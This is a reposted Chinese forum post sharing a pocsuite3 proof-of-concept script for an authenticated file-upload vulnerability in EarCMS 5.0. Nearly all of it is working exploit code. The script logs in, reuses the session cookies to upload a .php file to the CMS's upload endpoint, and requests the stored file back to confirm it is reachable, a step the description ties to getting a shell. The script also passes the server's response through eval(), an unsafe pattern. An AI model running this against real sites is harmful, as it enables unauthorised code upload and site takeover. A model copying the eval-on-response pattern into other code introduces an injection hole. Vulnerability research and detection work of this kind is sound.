EarCMS后台文件上传漏洞检测脚本
2019-10-10 16:49:15 Author: forum.90sec.com(查看原文) 阅读量:331 收藏

EarCMS后台文件上传漏洞,pocsuite3检测脚本,内容为python编写的模拟登录后,通过cookie来上传文件,刚学习python不久,希望可以有更多的学习机会

# coding: utf-8
from urllib import parse as urlparse
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
from urllib.parse import urljoin

class TestPOC(POCBase):#TestPOC最后注册用
    vulID = '12763'
    version = '5.0'
    author = 'marry'
    vulDate = '2019-05-13'
    createDate = '2019-09-29'
    updateDate = '2019-09-29'
    references = ['https://xz.aliyun.com/t/5873']
    name = 'EarCMS后台文件上传'
    appPowerLink = 'http://www.earcms.net/'
    appName = 'earcms'
    appVersion = '5.0'
    vulType = 'file upload'
    desc = '''
    Front Register Account, Malicious File Upload, getshell
    '''
    def  _verify(self):
        def check(url):
            headers = {
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'
            }
            url_login ='/source/index/ajax.php?ac=login&[email protected]&pwd=xxxx'#替换自己的mail和pwd
            url_0 =urljoin(self.url,url_login)#拼接字符串,在类中忘记写self了
            res = req.get(url=url_0, headers=headers)
            PHPSESSID = res.cookies['PHPSESSID']
            in_userid = res.cookies['in_userid']
            in_username = res.cookies['in_username']
            in_userpassword = res.cookies['in_userpassword']
            cookies = {'PHPSESSID': PHPSESSID, 'in_userid': in_userid, 'in_username': in_username,
                       'in_userpassword': in_userpassword}
            path ='/source/pack/upload/index-uplog.php'
            url_1 = urljoin(self.url,path)
            files = {'app': ('1.php', '123', 'application/octet-stream')}
            data = {
                "time": "1-1569738560"
            }#如果我们需要在上传文件的同时传递一些其它参数,在这浪费了太多时间,一开始没看见time参数,报错没看,把它放在data中
            try:
                r = req.post(url_1, headers=headers, cookies=cookies, files=files, data=data)
                if '1-1569738560' in r.text:
                    name = eval(r.text)['time']
                url_2 = url+ '/data/tmp/' + name + '.php'
                respose = req.get(url_2, headers)
                if '123' in respose.text:
                    resmsg = respose.text
                else:
                    resmsg ='no_upload_file'
            except Exception as e:
                pass
            if '123' in resmsg:
                return (True, resmsg)
            else:
                return(False,resmsg)
        result ={}
        pr = urlparse.urlparse(self.url)
        if pr.port:  # and pr.port not in ports:
            ports = [pr.port]
        else:
            ports =[80]
        for port in ports:
            try:
                url = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
                status,msg = check(url)
                if status:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
                    result['VerifyInfo']['payload'] = msg

            except:
                pass
        return self.parse_output(result)
    def _attack(self):#攻击代码
        return self._verify()#没有攻击模式,只有验证模式

    def parse_output(self, result):#标准的输入模式
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output

register(TestPOC)


文章来源: https://forum.90sec.com/t/topic/522/1
如有侵权请联系:admin#unsafe.sh